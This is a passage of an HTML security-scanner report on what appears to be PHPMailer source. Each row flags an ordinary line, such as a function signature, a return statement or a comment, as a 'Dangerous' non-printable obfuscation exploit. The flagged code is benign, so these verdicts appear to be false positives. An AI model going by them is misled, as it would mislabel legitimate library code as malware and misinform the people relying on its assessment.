</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1600</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">smtpSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1602</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">mailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1606</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">$sendMethod</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1630</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">sendmailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1704</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isShellSafe</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1731</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions that access local file paths</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1736</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isPermittedPath</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1738</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return !</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'#^[a-z]+://#i'</span><span style="color: #007700">, </span><span style="color: #0000BB">$path</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1750</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1759</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return-</span><span style="color: #0000BB">path header by the receiver</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1791</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to load your own SMTP implementation</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1792</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">SMTP</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1794</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getSMTPInstance</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1799</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">smtp</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1804</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">there is a bad MAIL FROM</span><span style="color: #007700">, </span><span style="color: #0000BB">RCPT</span><span style="color: #007700">, or </span><span style="color: #0000BB">DATA input</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1814</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smtpSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1870</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">the operation failed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1877</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smtpConnect</span><span style="color: #007700">(</span><span style="color: #0000BB">$options </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1999</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smtpClose</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2011</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">it cannot load the language file</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2018</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setLanguage</span><span style="color: #007700">(</span><span style="color: #0000BB">$langcode </span><span style="color: #007700">= </span><span style="color: #DD0000">'en'</span><span style="color: #007700">, </span><span style="color: #0000BB">$lang_path </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2045</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #DD0000">',</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2078</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">$foundlang</span><span style="color: #007700">; </span><span style="color: #FF8000">// Returns false if language not found</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2085</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getTranslations</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2087</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">language</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2100</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addrAppend</span><span style="color: #007700">(</span><span style="color: #0000BB">$type</span><span style="color: #007700">, </span><span style="color: #0000BB">$addr</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2106</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$type </span><span style="color: #007700">. </span><span style="color: #DD0000">': ' </span><span style="color: #007700">. </span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">', '</span><span style="color: #007700">, </span><span style="color: #0000BB">$addresses</span><span style="color: #007700">) . </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2116</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addrFormat</span><span style="color: #007700">(</span><span style="color: #0000BB">$addr</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2119</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$addr</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2121</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">encodeHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$addr</span><span style="color: #007700">[</span><span style="color: #0000BB">1</span><span style="color: #007700">]), </span><span style="color: #DD0000">'phrase'</span><span style="color: #007700">) . </span><span style="color: #DD0000">' <' </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2138</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wrapText</span><span style="color: #007700">(</span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$length</span><span style="color: #007700">, </span><span style="color: #0000BB">$qp_mode </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2225</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$message</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2235</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">integer</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2237</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">utf8CharBoundary</span><span style="color: #007700">(</span><span style="color: #0000BB">$encodedText</span><span style="color: #007700">, </span><span style="color: #0000BB">$maxLength</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2271</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$maxLength</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2282</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setWordWrap</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2304</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The assembled headers</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2306</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">createHeader</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2401</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getMailMIME</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2449</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns the whole MIME message</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2456</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getSentMIMEMessage</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2458</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">rtrim</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">mailHeader</span><span style="color: #007700">, </span><span style="color: #DD0000">"\n\r"</span><span style="color: #007700">) . </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">CRLF </span><span style="color: #007700">. </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">CRLF </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2465</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">generateId</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2466</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">md5</span><span style="color: #007700">(</span><span style="color: #0000BB">uniqid</span><span style="color: #007700">(</span><span style="color: #0000BB">time</span><span style="color: #007700">()));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2471</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns an </span><span style="color: #007700">empty </span><span style="color: #0000BB">string on failure</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2474</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The assembled message body</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2476</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">createBody</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2662</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returned by openssl contains both headers </span><span style="color: #007700">and </span><span style="color: #0000BB">body</span><span style="color: #007700">, </span><span style="color: #0000BB">so need to split them up</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2678</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$body</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2682</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the start of a message boundary</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2690</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getBoundary</span><span style="color: #007700">(</span><span style="color: #0000BB">$boundary</span><span style="color: #007700">, </span><span style="color: #0000BB">$charSet</span><span style="color: #007700">, </span><span style="color: #0000BB">$contentType</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2715</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the end of a message boundary</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2720</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">endBoundary</span><span style="color: #007700">(</span><span style="color: #0000BB">$boundary</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2722</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE </span><span style="color: #007700">. </span><span style="color: #DD0000">'--' </span><span style="color: #007700">. </span><span style="color: #0000BB">$boundary </span><span style="color: #007700">. </span><span style="color: #DD0000">'--' </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
